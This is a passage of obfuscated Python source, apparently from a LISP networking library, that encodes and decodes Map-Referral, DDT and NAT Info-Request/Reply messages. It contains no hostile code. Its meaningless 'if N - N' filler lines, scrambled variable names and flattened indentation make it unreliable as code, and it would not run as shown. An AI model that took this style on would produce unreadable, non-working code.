if 67 - 67: II111iiii / O0
if 10 - 10: i1IIi / Oo0Ooo
if 20 - 20: Oo0Ooo * I1Ii111 / I1ii11iIi11i . ooOoO0o
if 67 - 67: o0oOOo0O0Ooo . Oo0Ooo % I11i
if 38 - 38: OOooOOo - OoO0O00 . ooOoO0o
if 50 - 50: o0oOOo0O0Ooo
if 85 - 85: II111iiii . iII111i - i1IIi
if 23 - 23: iII111i . Ii1I - OoO0O00 / I1ii11iIi11i / O0
if 4 - 4: i1IIi % Oo0Ooo % Ii1I * ooOoO0o - I11i
if 76 - 76: iIii1I11I1II1 / ooOoO0o % I1ii11iIi11i % OOooOOo
if 13 - 13: IiII
if 56 - 56: Oo0Ooo
if 55 - 55: i11iIiiIii + iIii1I11I1II1 / i1IIi / I1ii11iIi11i
if 64 - 64: IiII . OoO0O00 * i11iIiiIii
if 18 - 18: Ii1I % o0oOOo0O0Ooo - Oo0Ooo
if 28 - 28: IiII
if 93 - 93: Oo0Ooo % i1IIi
if 51 - 51: oO0o % O0
if 41 - 41: I1IiiI * I1IiiI . I1Ii111
if 38 - 38: I1IiiI % i11iIiiIii
if 17 - 17: i11iIiiIii
if 81 - 81: I1Ii111
if 25 - 25: I1IiiI
if 52 - 52: I1ii11iIi11i % i1IIi . IiII % OoOoOO00
class lisp_map_referral ( object ) :
def __init__ ( self ) :
self . record_count = 0
self . nonce = 0
if 50 - 50: OOooOOo * I1IiiI / o0oOOo0O0Ooo
if 91 - 91: iIii1I11I1II1 / OOooOOo * O0 . o0oOOo0O0Ooo + oO0o / I1ii11iIi11i
def print_map_referral ( self ) :
lprint ( "{} -> record-count: {}, nonce: 0x{}" . format ( bold ( "Map-Referral" , False ) , self . record_count ,
# Oo0Ooo / II111iiii
lisp_hex_string ( self . nonce ) ) )
if 76 - 76: OoOoOO00 % OoO0O00 * O0
if 39 - 39: ooOoO0o / iII111i
def encode ( self ) :
iIiIii = ( LISP_MAP_REFERRAL << 28 ) | self . record_count
Oo00oo = struct . pack ( "I" , socket . htonl ( iIiIii ) )
Oo00oo += struct . pack ( "Q" , self . nonce )
return ( Oo00oo )
if 94 - 94: oO0o + iII111i * OoOoOO00 - i1IIi / OoooooooOO
if 59 - 59: I11i % Ii1I / OoOoOO00
def decode ( self , packet ) :
iiII1iiI = "I"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
if 99 - 99: Ii1I + II111iiii / i11iIiiIii - IiII / iII111i + iII111i
iIiIii = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] )
iIiIii = socket . ntohl ( iIiIii [ 0 ] )
self . record_count = iIiIii & 0xff
packet = packet [ ooo0000oo0 : : ]
if 55 - 55: IiII + OoooooooOO * I1ii11iIi11i . IiII * I1ii11iIi11i + IiII
iiII1iiI = "Q"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
if 81 - 81: iIii1I11I1II1 . ooOoO0o + OoOoOO00
self . nonce = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] ) [ 0 ]
packet = packet [ ooo0000oo0 : : ]
return ( packet )
if 31 - 31: I11i / OoOoOO00 + o0oOOo0O0Ooo
if 80 - 80: Oo0Ooo
if 58 - 58: I1Ii111 + OOooOOo
if 76 - 76: II111iiii - o0oOOo0O0Ooo % OoO0O00 + iII111i
if 38 - 38: I1Ii111 - I11i * i1IIi + iIii1I11I1II1
if 41 - 41: Ii1I . OoO0O00 + I1ii11iIi11i + OoOoOO00
if 76 - 76: iII111i - iIii1I11I1II1
if 23 - 23: I11i / OoO0O00 % OOooOOo
class lisp_ddt_entry ( object ) :
def __init__ ( self ) :
self . eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . uptime = lisp_get_timestamp ( )
self . delegation_set = [ ]
self . source_cache = None
self . map_referrals_sent = 0
if 9 - 9: ooOoO0o % I1ii11iIi11i . OoooooooOO + OoO0O00 % OOooOOo * OoooooooOO
if 21 - 21: Ii1I % O0
def is_auth_prefix ( self ) :
if ( len ( self . delegation_set ) != 0 ) : return ( False )
if ( self . is_star_g ( ) ) : return ( False )
return ( True )
if 15 - 15: II111iiii * Ii1I + IiII % iII111i
if 96 - 96: II111iiii * I1Ii111 / Oo0Ooo
def is_ms_peer_entry ( self ) :
if ( len ( self . delegation_set ) == 0 ) : return ( False )
return ( self . delegation_set [ 0 ] . is_ms_peer ( ) )
if 35 - 35: I1IiiI
if 54 - 54: I1ii11iIi11i % o0oOOo0O0Ooo . i1IIi
def print_referral_type ( self ) :
if ( len ( self . delegation_set ) == 0 ) : return ( "unknown" )
o0oO0OO0Oo0 = self . delegation_set [ 0 ]
return ( o0oO0OO0Oo0 . print_node_type ( ) )
if 64 - 64: i11iIiiIii - Oo0Ooo / iIii1I11I1II1 / I1IiiI % ooOoO0o
if 42 - 42: Oo0Ooo * OoOoOO00 % ooOoO0o * oO0o - Oo0Ooo + OOooOOo
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
if 5 - 5: OoooooooOO * O0 / I1Ii111 + ooOoO0o . I1Ii111
if 57 - 57: ooOoO0o * OOooOOo % OoOoOO00 - OoOoOO00 - o0oOOo0O0Ooo * i1IIi
def add_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_ddt_cache . add_cache ( self . eid , self )
else :
o0O0o0OOOoO = lisp_ddt_cache . lookup_cache ( self . group , True )
if ( o0O0o0OOOoO == None ) :
o0O0o0OOOoO = lisp_ddt_entry ( )
o0O0o0OOOoO . eid . copy_address ( self . group )
o0O0o0OOOoO . group . copy_address ( self . group )
lisp_ddt_cache . add_cache ( self . group , o0O0o0OOOoO )
if 24 - 24: o0oOOo0O0Ooo - i11iIiiIii + i11iIiiIii . I1IiiI - OOooOOo
if ( self . eid . is_null ( ) ) : self . eid . make_default_route ( o0O0o0OOOoO . group )
o0O0o0OOOoO . add_source_entry ( self )
if 16 - 16: OOooOOo
if 74 - 74: I11i . II111iiii + O0 * II111iiii
if 50 - 50: IiII
def add_source_entry ( self , source_ddt ) :
if ( self . source_cache == None ) : self . source_cache = lisp_cache ( )
self . source_cache . add_cache ( source_ddt . eid , source_ddt )
if 7 - 7: OoO0O00 / I1IiiI * Ii1I % OoO0O00 + OoO0O00 % II111iiii
if 83 - 83: O0 % o0oOOo0O0Ooo
def lookup_source_cache ( self , source , exact ) :
if ( self . source_cache == None ) : return ( None )
return ( self . source_cache . lookup_cache ( source , exact ) )
if 77 - 77: I1Ii111 - OoooooooOO
if 2 - 2: OoOoOO00 - OOooOOo * o0oOOo0O0Ooo / OoO0O00 - IiII % I1IiiI
def is_star_g ( self ) :
if ( self . group . is_null ( ) ) : return ( False )
return ( self . eid . is_exact_match ( self . group ) )
if 98 - 98: iIii1I11I1II1
if 49 - 49: I1IiiI - I11i
if 63 - 63: i11iIiiIii . OoO0O00 . oO0o
class lisp_ddt_node ( object ) :
def __init__ ( self ) :
self . delegate_address = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . public_key = ""
self . map_server_peer = False
self . map_server_child = False
self . priority = 0
self . weight = 0
if 85 - 85: oO0o . I1ii11iIi11i + i11iIiiIii
if 85 - 85: I11i
def print_node_type ( self ) :
if ( self . is_ddt_child ( ) ) : return ( "ddt-child" )
if ( self . is_ms_child ( ) ) : return ( "map-server-child" )
if ( self . is_ms_peer ( ) ) : return ( "map-server-peer" )
if 36 - 36: ooOoO0o % OoO0O00
if 1 - 1: OoooooooOO - OoOoOO00
def is_ddt_child ( self ) :
if ( self . map_server_child ) : return ( False )
if ( self . map_server_peer ) : return ( False )
return ( True )
if 35 - 35: I1Ii111
if 35 - 35: Oo0Ooo - iIii1I11I1II1 / i1IIi + OoO0O00 - OoooooooOO / i11iIiiIii
def is_ms_child ( self ) :
return ( self . map_server_child )
if 79 - 79: I1IiiI * ooOoO0o * ooOoO0o
if 92 - 92: iII111i % I1ii11iIi11i
def is_ms_peer ( self ) :
return ( self . map_server_peer )
if 16 - 16: oO0o
if 52 - 52: OoooooooOO % ooOoO0o - I1Ii111 * I11i
if 24 - 24: Ii1I + IiII + OoooooooOO / oO0o / I1IiiI + IiII
if 52 - 52: ooOoO0o
if 38 - 38: OoO0O00 + I1IiiI % IiII
if 87 - 87: oO0o * Ii1I - I1Ii111 / oO0o
if 65 - 65: OoOoOO00
class lisp_ddt_map_request ( object ) :
def __init__ ( self , lisp_sockets , packet , eid , group , nonce ) :
self . uptime = lisp_get_timestamp ( )
self . lisp_sockets = lisp_sockets
self . packet = packet
self . eid = eid
self . group = group
self . nonce = nonce
self . mr_source = None
self . sport = 0
self . itr = None
self . retry_count = 0
self . send_count = 0
self . retransmit_timer = None
self . last_request_sent_to = None
self . from_pitr = False
self . tried_root = False
self . last_cached_prefix = [ None , None ]
if 87 - 87: I11i - i11iIiiIii - OOooOOo . OoOoOO00 + IiII . OoO0O00
if 70 - 70: iIii1I11I1II1 % OoooooooOO / OoO0O00 . O0 - I11i % II111iiii
def print_ddt_map_request ( self ) :
lprint ( "Queued Map-Request from {}ITR {}->{}, nonce 0x{}" . format ( "P" if self . from_pitr else "" ,
# I1Ii111 * iIii1I11I1II1 % I1Ii111 / OoOoOO00 . iII111i
red ( self . itr . print_address ( ) , False ) ,
green ( self . eid . print_address ( ) , False ) , self . nonce ) )
if 40 - 40: ooOoO0o / I1ii11iIi11i / IiII % o0oOOo0O0Ooo - oO0o . i1IIi
if 98 - 98: II111iiii * OoooooooOO % oO0o - iII111i
def queue_map_request ( self ) :
self . retransmit_timer = threading . Timer ( LISP_DDT_MAP_REQUEST_INTERVAL ,
lisp_retransmit_ddt_map_request , [ self ] )
self . retransmit_timer . start ( )
lisp_ddt_map_requestQ [ str ( self . nonce ) ] = self
if 97 - 97: OoO0O00 / OOooOOo + Ii1I % O0
if 36 - 36: OoooooooOO . I1Ii111 + OoOoOO00 % OoO0O00 % I11i . iIii1I11I1II1
def dequeue_map_request ( self ) :
self . retransmit_timer . cancel ( )
if ( self . nonce in lisp_ddt_map_requestQ ) :
lisp_ddt_map_requestQ . pop ( str ( self . nonce ) )
if 57 - 57: oO0o % iII111i + IiII + oO0o
if 31 - 31: iII111i + I1IiiI % OOooOOo
if 6 - 6: i1IIi / OoOoOO00 + I11i . OoO0O00 . iII111i * II111iiii
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
if 58 - 58: i1IIi / I1ii11iIi11i - IiII / I11i
if 68 - 68: OOooOOo % OoOoOO00 / I1IiiI % iII111i / O0 % i1IIi
if 2 - 2: i1IIi / OOooOOo * O0
if 99 - 99: OoooooooOO . OoOoOO00 / II111iiii
if 64 - 64: iII111i / i1IIi . I1IiiI + O0
if 5 - 5: O0 . i11iIiiIii
if 71 - 71: o0oOOo0O0Ooo + iII111i + ooOoO0o
if 27 - 27: OoooooooOO . iII111i * I1Ii111 % O0 + OoooooooOO - iII111i
if 86 - 86: i1IIi
if 81 - 81: OoOoOO00
if 52 - 52: iII111i * IiII % I1IiiI * I11i
if 73 - 73: I1Ii111 * ooOoO0o
if 62 - 62: OOooOOo . I1IiiI * iIii1I11I1II1 + OoO0O00 * ooOoO0o / oO0o
if 14 - 14: iII111i / OoO0O00
if 75 - 75: IiII
if 68 - 68: IiII - i1IIi % IiII . OoO0O00 . i11iIiiIii . OoooooooOO
if 32 - 32: iII111i + OoO0O00 % IiII + I1IiiI
if 69 - 69: I1Ii111 + I11i - iIii1I11I1II1 - II111iiii . Ii1I
if 74 - 74: I1ii11iIi11i % o0oOOo0O0Ooo + O0 - i11iIiiIii - IiII % OOooOOo
if 39 - 39: OoO0O00 - o0oOOo0O0Ooo
LISP_DDT_ACTION_SITE_NOT_FOUND = - 2
LISP_DDT_ACTION_NULL = - 1
LISP_DDT_ACTION_NODE_REFERRAL = 0
LISP_DDT_ACTION_MS_REFERRAL = 1
LISP_DDT_ACTION_MS_ACK = 2
LISP_DDT_ACTION_MS_NOT_REG = 3
LISP_DDT_ACTION_DELEGATION_HOLE = 4
LISP_DDT_ACTION_NOT_AUTH = 5
LISP_DDT_ACTION_MAX = LISP_DDT_ACTION_NOT_AUTH
if 71 - 71: iII111i . OoO0O00 + ooOoO0o - OOooOOo - Oo0Ooo
lisp_map_referral_action_string = [
"node-referral" , "ms-referral" , "ms-ack" , "ms-not-registered" ,
"delegation-hole" , "not-authoritative" ]
if 100 - 100: OoooooooOO - o0oOOo0O0Ooo + I1Ii111 . OoooooooOO % i11iIiiIii
if 64 - 64: I1Ii111 % OoooooooOO / i1IIi / OoO0O00
if 2 - 2: I11i % o0oOOo0O0Ooo . OoO0O00 . OoO0O00
if 89 - 89: ooOoO0o - oO0o + II111iiii + OoO0O00 - IiII
if 27 - 27: I1Ii111 - o0oOOo0O0Ooo + OoO0O00
if 38 - 38: OoOoOO00 + OoO0O00 . i11iIiiIii + Ii1I % i1IIi % I1IiiI
if 93 - 93: i11iIiiIii
if 63 - 63: iIii1I11I1II1 - iIii1I11I1II1 % o0oOOo0O0Ooo
if 97 - 97: i1IIi % I11i % OoOoOO00
if 25 - 25: OoOoOO00 . iIii1I11I1II1 - iII111i % II111iiii . OoOoOO00
if 16 - 16: OOooOOo . Oo0Ooo . I1IiiI % O0 . I1ii11iIi11i + i11iIiiIii
if 100 - 100: I1ii11iIi11i - i1IIi - OoO0O00 * o0oOOo0O0Ooo + OoOoOO00
if 31 - 31: i1IIi
if 21 - 21: o0oOOo0O0Ooo / O0 % O0 . OoooooooOO / I1IiiI
if 94 - 94: ooOoO0o + OoO0O00 / ooOoO0o - ooOoO0o + Oo0Ooo + o0oOOo0O0Ooo
if 50 - 50: oO0o . Oo0Ooo
if 15 - 15: Ii1I
if 64 - 64: OoooooooOO
if 25 - 25: IiII
if 29 - 29: OoOoOO00 % ooOoO0o * OoooooooOO
if 8 - 8: i11iIiiIii - I1Ii111 / IiII
if 17 - 17: i11iIiiIii * OoO0O00 . o0oOOo0O0Ooo . OoooooooOO . OoOoOO00 - I1ii11iIi11i
if 78 - 78: I1ii11iIi11i - OoooooooOO + O0
if 15 - 15: I1ii11iIi11i / IiII % I1IiiI
if 16 - 16: Ii1I
if 26 - 26: o0oOOo0O0Ooo / I11i + OoOoOO00 / OoOoOO00
if 31 - 31: I1Ii111
if 84 - 84: i11iIiiIii * OOooOOo . iII111i - Ii1I * i1IIi - I1ii11iIi11i
if 1 - 1: II111iiii
if 94 - 94: I1ii11iIi11i * iII111i % iII111i % I11i - iII111i
if 38 - 38: IiII - OoO0O00 % Ii1I - II111iiii
if 97 - 97: O0 . Ii1I
if 52 - 52: IiII
if 86 - 86: I1Ii111 / O0 + OoooooooOO % oO0o
if 45 - 45: I1IiiI . Oo0Ooo . I11i . Ii1I
if 81 - 81: II111iiii + OoOoOO00 % i11iIiiIii / iII111i . I1Ii111 + II111iiii
if 48 - 48: I1IiiI . I1ii11iIi11i * OoOoOO00 % i1IIi / I1Ii111 * II111iiii
if 62 - 62: o0oOOo0O0Ooo * I1Ii111 . iIii1I11I1II1 / i1IIi
if 75 - 75: OoooooooOO / ooOoO0o - iII111i . OoooooooOO . OoOoOO00 % i1IIi
if 7 - 7: OoOoOO00 . i1IIi * i11iIiiIii % i11iIiiIii
if 54 - 54: OoO0O00 / I1IiiI . Oo0Ooo
if 39 - 39: OoO0O00 . ooOoO0o
if 41 - 41: Oo0Ooo * I1ii11iIi11i - II111iiii - II111iiii
if 7 - 7: oO0o
if 41 - 41: ooOoO0o
if 93 - 93: Ii1I + I1Ii111 + Ii1I
if 23 - 23: I1IiiI - i1IIi / ooOoO0o
if 4 - 4: IiII . I1ii11iIi11i + iII111i % ooOoO0o
if 28 - 28: I1Ii111
if 27 - 27: iII111i * I1IiiI
if 60 - 60: i1IIi / I1IiiI - I1ii11iIi11i
if 41 - 41: I1Ii111 + ooOoO0o / OOooOOo + I11i % Oo0Ooo
if 91 - 91: I1IiiI % I1ii11iIi11i % oO0o / i1IIi * iIii1I11I1II1 + I11i
if 48 - 48: ooOoO0o / I1ii11iIi11i / OoO0O00 / II111iiii * OoOoOO00
if 73 - 73: I11i / I1IiiI - IiII - i1IIi * IiII - OOooOOo
if 39 - 39: I11i . ooOoO0o * II111iiii
if 21 - 21: Ii1I
if 92 - 92: OoO0O00 * I1ii11iIi11i + iIii1I11I1II1
if 88 - 88: iIii1I11I1II1 + iIii1I11I1II1 * i11iIiiIii . I1ii11iIi11i % oO0o
class lisp_info ( object ) :
def __init__ ( self ) :
self . info_reply = False
self . nonce = 0
self . private_etr_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . global_etr_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . global_ms_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . ms_port = 0
self . etr_port = 0
self . rtr_list = [ ]
self . hostname = lisp_hostname
if 94 - 94: I1IiiI / I1ii11iIi11i / OOooOOo
if 45 - 45: II111iiii
def print_info ( self ) :
if ( self . info_reply ) :
Oo0OoO = "Info-Reply"
iIIiI11 = ( ", ms-port: {}, etr-port: {}, global-rloc: {}, " + "ms-rloc: {}, private-rloc: {}, RTR-list: " ) . format ( self . ms_port , self . etr_port ,
# O0 * Oo0Ooo - ooOoO0o
# I1IiiI . IiII - i11iIiiIii . I1Ii111
red ( self . global_etr_rloc . print_address_no_iid ( ) , False ) ,
red ( self . global_ms_rloc . print_address_no_iid ( ) , False ) ,
red ( self . private_etr_rloc . print_address_no_iid ( ) , False ) )
if ( len ( self . rtr_list ) == 0 ) : iIIiI11 += "empty, "
for iiO0ooooOooo in self . rtr_list :
iIIiI11 += red ( iiO0ooooOooo . print_address_no_iid ( ) , False ) + ", "
if 78 - 78: iIii1I11I1II1 - i1IIi . I11i . o0oOOo0O0Ooo
iIIiI11 = iIIiI11 [ 0 : - 2 ]
else :
Oo0OoO = "Info-Request"
oOOOo00000Oo = "<none>" if self . hostname == None else self . hostname
iIIiI11 = ", hostname: {}" . format ( blue ( oOOOo00000Oo , False ) )
if 94 - 94: II111iiii
lprint ( "{} -> nonce: 0x{}{}" . format ( bold ( Oo0OoO , False ) ,
lisp_hex_string ( self . nonce ) , iIIiI11 ) )
if 27 - 27: OOooOOo
if 95 - 95: oO0o - I1Ii111 + Oo0Ooo
def encode ( self ) :
iIiIii = ( LISP_NAT_INFO << 28 )
if ( self . info_reply ) : iIiIii |= ( 1 << 27 )
if 32 - 32: iIii1I11I1II1 - ooOoO0o . o0oOOo0O0Ooo
if 88 - 88: i1IIi
if 9 - 9: II111iiii + O0 + ooOoO0o - i11iIiiIii / OoooooooOO
if 27 - 27: oO0o
if 61 - 61: I1Ii111 / O0 - iII111i
if 44 - 44: i1IIi
if 23 - 23: I1ii11iIi11i . OoooooooOO / Ii1I + o0oOOo0O0Ooo
Oo00oo = struct . pack ( "I" , socket . htonl ( iIiIii ) )
Oo00oo += struct . pack ( "Q" , self . nonce )
Oo00oo += struct . pack ( "III" , 0 , 0 , 0 )
if 89 - 89: OoOoOO00 + Oo0Ooo . OoOoOO00 - II111iiii
if 85 - 85: OoooooooOO * OoooooooOO / Ii1I - II111iiii
if 69 - 69: iII111i * I11i
if 43 - 43: o0oOOo0O0Ooo - IiII * Ii1I . i11iIiiIii / II111iiii
if ( self . info_reply == False ) :
if ( self . hostname == None ) :
Oo00oo += struct . pack ( "H" , 0 )
else :
Oo00oo += struct . pack ( "H" , socket . htons ( LISP_AFI_NAME ) )
Oo00oo += ( self . hostname + "\0" ) . encode ( )
if 61 - 61: OoOoOO00 / I1IiiI . I1ii11iIi11i % OOooOOo
return ( Oo00oo )
if 70 - 70: OOooOOo * OoOoOO00 / oO0o + Oo0Ooo / O0
if 16 - 16: Oo0Ooo / OoooooooOO / IiII + Oo0Ooo * i11iIiiIii
if 15 - 15: o0oOOo0O0Ooo / i11iIiiIii
if 63 - 63: I1ii11iIi11i - Ii1I + I11i
if 98 - 98: iII111i / IiII * I1IiiI / oO0o - iIii1I11I1II1
i1I1iiiI = socket . htons ( LISP_AFI_LCAF )
ooOoOoOo = LISP_LCAF_NAT_TYPE
iIIIi1Iii1 = socket . htons ( 16 )
oo0OoOoO0O = socket . htons ( self . ms_port )
iI1ii1 = socket . htons ( self . etr_port )
Oo00oo += struct . pack ( "HHBBHHHH" , i1I1iiiI , 0 , ooOoOoOo , 0 , iIIIi1Iii1 ,
oo0OoOoO0O , iI1ii1 , socket . htons ( self . global_etr_rloc . afi ) )
Oo00oo += self . global_etr_rloc . pack_address ( )
Oo00oo += struct . pack ( "HH" , 0 , socket . htons ( self . private_etr_rloc . afi ) )
Oo00oo += self . private_etr_rloc . pack_address ( )
if ( len ( self . rtr_list ) == 0 ) : Oo00oo += struct . pack ( "H" , 0 )
if 55 - 55: i11iIiiIii * OOooOOo * I1ii11iIi11i
if 17 - 17: iIii1I11I1II1 - OoOoOO00
if 97 - 97: iIii1I11I1II1 / OOooOOo * i1IIi - OoO0O00 / ooOoO0o % Ii1I
if 30 - 30: OoOoOO00 / oO0o . iII111i
for iiO0ooooOooo in self . rtr_list :
Oo00oo += struct . pack ( "H" , socket . htons ( iiO0ooooOooo . afi ) )
Oo00oo += iiO0ooooOooo . pack_address ( )
if 56 - 56: OoOoOO00
return ( Oo00oo )
if 83 - 83: OOooOOo
if 17 - 17: IiII + I1IiiI - I11i . I1IiiI
def decode ( self , packet ) :
i1o0o0oOO = packet
iiII1iiI = "I"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
if 34 - 34: ooOoO0o . i11iIiiIii * I1IiiI . II111iiii - iIii1I11I1II1
iIiIii = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] )
iIiIii = iIiIii [ 0 ]
packet = packet [ ooo0000oo0 : : ]
if 43 - 43: i11iIiiIii % OoO0O00
iiII1iiI = "Q"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
if 100 - 100: i1IIi
o0Oo0o = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] )
if 4 - 4: i11iIiiIii - OOooOOo * IiII % OoooooooOO - OoOoOO00
iIiIii = socket . ntohl ( iIiIii )
self . nonce = o0Oo0o [ 0 ]
self . info_reply = iIiIii & 0x08000000
self . hostname = None
packet = packet [ ooo0000oo0 : : ]
if 81 - 81: Ii1I * ooOoO0o . oO0o . IiII
if 71 - 71: IiII + OoO0O00
if 39 - 39: I1IiiI % IiII / II111iiii / II111iiii
if 95 - 95: II111iiii + i11iIiiIii + o0oOOo0O0Ooo
if 30 - 30: O0 - O0 % iIii1I11I1II1 + iII111i * OoooooooOO
iiII1iiI = "HH"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
if 1 - 1: O0
if 36 - 36: oO0o . iII111i
if 62 - 62: I11i + iIii1I11I1II1 % I11i * OOooOOo + iIii1I11I1II1 % Ii1I
if 56 - 56: o0oOOo0O0Ooo
if 55 - 55: oO0o - I1Ii111 / ooOoO0o % I1IiiI * OoooooooOO * I1IiiI
IiII11iI1 , oOOOO00o00 = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] )
if ( oOOOO00o00 != 0 ) : return ( None )
if 88 - 88: Ii1I + O0
packet = packet [ ooo0000oo0 : : ]
iiII1iiI = "IBBH"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
if 92 - 92: I1IiiI % iII111i % I11i + OoooooooOO - i11iIiiIii
O0O00O , OOOo00o , iiii11I1 , I1I11i1 = struct . unpack ( iiII1iiI ,
packet [ : ooo0000oo0 ] )
if 18 - 18: ooOoO0o / OOooOOo / I11i / OoooooooOO - Ii1I / I1ii11iIi11i
if ( I1I11i1 != 0 ) : return ( None )
packet = packet [ ooo0000oo0 : : ]
if 45 - 45: ooOoO0o - OOooOOo . Ii1I
if 99 - 99: I11i / OoOoOO00 % OoO0O00 * Ii1I / OOooOOo
if 9 - 9: ooOoO0o - ooOoO0o * I1ii11iIi11i
if 92 - 92: Ii1I
if ( self . info_reply == False ) :
iiII1iiI = "H"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) >= ooo0000oo0 ) :
i1I1iiiI = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] ) [ 0 ]
if ( socket . ntohs ( i1I1iiiI ) == LISP_AFI_NAME ) :
packet = packet [ ooo0000oo0 : : ]
packet , self . hostname = lisp_decode_dist_name ( packet )
if 88 - 88: OoooooooOO * i1IIi % I1ii11iIi11i % Oo0Ooo
if 1 - 1: OoO0O00 / iIii1I11I1II1 % I1ii11iIi11i - o0oOOo0O0Ooo
return ( i1o0o0oOO )
if 62 - 62: I1Ii111 % II111iiii
if 91 - 91: I11i % Ii1I - IiII + iIii1I11I1II1 * iIii1I11I1II1
if 91 - 91: i11iIiiIii + Ii1I
if 85 - 85: I11i % IiII
if 68 - 68: Oo0Ooo . I1Ii111 - o0oOOo0O0Ooo * iIii1I11I1II1 - II111iiii % i1IIi
iiII1iiI = "HHBBHHH"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
if 58 - 58: I11i / i11iIiiIii * i11iIiiIii
i1I1iiiI , Oo0OoO00O , ooOoOoOo , OOOo00o , iIIIi1Iii1 , oo0OoOoO0O , iI1ii1 = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] )
if 24 - 24: ooOoO0o - I1Ii111 * II111iiii - II111iiii
if 47 - 47: IiII - iIii1I11I1II1 / OoOoOO00 * iII111i - iIii1I11I1II1 % oO0o
if ( socket . ntohs ( i1I1iiiI ) != LISP_AFI_LCAF ) : return ( None )
if 93 - 93: Ii1I / iII111i
self . ms_port = socket . ntohs ( oo0OoOoO0O )
self . etr_port = socket . ntohs ( iI1ii1 )
packet = packet [ ooo0000oo0 : : ]
if 100 - 100: Oo0Ooo
if 94 - 94: I1ii11iIi11i / i1IIi * I1IiiI - I11i - I1ii11iIi11i
if 6 - 6: I1ii11iIi11i % o0oOOo0O0Ooo + o0oOOo0O0Ooo / OOooOOo / I1IiiI
if 67 - 67: OoOoOO00 . iII111i / OOooOOo * ooOoO0o + i1IIi
iiII1iiI = "H"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
if 100 - 100: OOooOOo . ooOoO0o + I1Ii111 . oO0o
if 20 - 20: i11iIiiIii - i1IIi - iIii1I11I1II1 - OoooooooOO
if 72 - 72: I1Ii111 . OoO0O00
if 59 - 59: I1IiiI * I11i % i1IIi
i1I1iiiI = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] ) [ 0 ]
packet = packet [ ooo0000oo0 : : ]
if ( i1I1iiiI != 0 ) :
self . global_etr_rloc . afi = socket . ntohs ( i1I1iiiI )
packet = self . global_etr_rloc . unpack_address ( packet )
if ( packet == None ) : return ( None )
self . global_etr_rloc . mask_len = self . global_etr_rloc . host_mask_len ( )
if 77 - 77: OOooOOo * OoooooooOO + I1IiiI + I1IiiI % oO0o . OoooooooOO
if 60 - 60: iIii1I11I1II1
if 13 - 13: II111iiii + Ii1I
if 33 - 33: i1IIi
if 36 - 36: ooOoO0o % ooOoO0o . i11iIiiIii
if 42 - 42: OoO0O00 . I1Ii111 / Ii1I
if ( len ( packet ) < ooo0000oo0 ) : return ( i1o0o0oOO )
if 57 - 57: iIii1I11I1II1 % I1ii11iIi11i . OOooOOo / oO0o . OoOoOO00
i1I1iiiI = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] ) [ 0 ]
packet = packet [ ooo0000oo0 : : ]
if ( i1I1iiiI != 0 ) :
self . global_ms_rloc . afi = socket . ntohs ( i1I1iiiI )
packet = self . global_ms_rloc . unpack_address ( packet )
if ( packet == None ) : return ( i1o0o0oOO )
self . global_ms_rloc . mask_len = self . global_ms_rloc . host_mask_len ( )
if 74 - 74: I1IiiI * OoO0O00 + OoooooooOO * ooOoO0o . oO0o
if 66 - 66: II111iiii + OOooOOo + i11iIiiIii / II111iiii
if 37 - 37: I1IiiI + OoO0O00 . OoO0O00 % OoOoOO00 + o0oOOo0O0Ooo
if 81 - 81: i1IIi % iIii1I11I1II1
if 41 - 41: oO0o - iII111i / o0oOOo0O0Ooo . iII111i % Oo0Ooo + OOooOOo
if ( len ( packet ) < ooo0000oo0 ) : return ( i1o0o0oOO )
if 82 - 82: ooOoO0o
i1I1iiiI = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] ) [ 0 ]
packet = packet [ ooo0000oo0 : : ]
if ( i1I1iiiI != 0 ) :
self . private_etr_rloc . afi = socket . ntohs ( i1I1iiiI )
packet = self . private_etr_rloc . unpack_address ( packet )
if ( packet == None ) : return ( i1o0o0oOO )
self . private_etr_rloc . mask_len = self . private_etr_rloc . host_mask_len ( )
if 89 - 89: OOooOOo / I1ii11iIi11i . I1IiiI + i11iIiiIii
if 11 - 11: oO0o . i11iIiiIii * ooOoO0o % OoooooooOO % O0
if 59 - 59: i11iIiiIii / OoO0O00
if 48 - 48: iIii1I11I1II1
if 19 - 19: oO0o
if 69 - 69: I1ii11iIi11i % iII111i - OoooooooOO % Ii1I * oO0o
while ( len ( packet ) >= ooo0000oo0 ) :
i1I1iiiI = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] ) [ 0 ]
packet = packet [ ooo0000oo0 : : ]
if ( i1I1iiiI == 0 ) : continue
